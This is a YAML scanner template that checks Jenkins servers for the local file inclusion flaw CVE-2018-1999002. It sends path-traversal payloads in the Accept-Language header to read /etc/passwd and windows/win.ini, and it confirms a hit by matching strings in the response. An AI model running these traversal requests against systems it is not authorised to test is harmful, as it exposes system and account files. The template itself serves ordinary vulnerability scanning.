id: jenkins-lfi-01
info:
  name: Jenkins LFI CVE-2018-1999002
  risk: Critical

params:
  - root: "{{.BaseURL}}"

replicate:
  ports: '8080'
  prefixes: 'jenkins'

requests:
  - method: GET
    redirect: false
    url: >-
      {{.root}}/plugin/jquery-detached/.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Accept-Language: "/../../../../../../../../../../../../windows/win"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "16-bit app support") && StringSearch("response", "mci extensions")
  - method: GET
    redirect: false
    url: >-
      {{.root}}/plugin/jquery-detached/.ini
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Accept-Language: "/../../../../../../../../../../../..//etc/passwd"
    detections:
      - >-
        StatusCode() == 200 && StringSearch("response", "root:") && StringSearch("response", "/bin/bash")

reference:
  link: https://jenkins.io/security/advisory/2018-08-15/
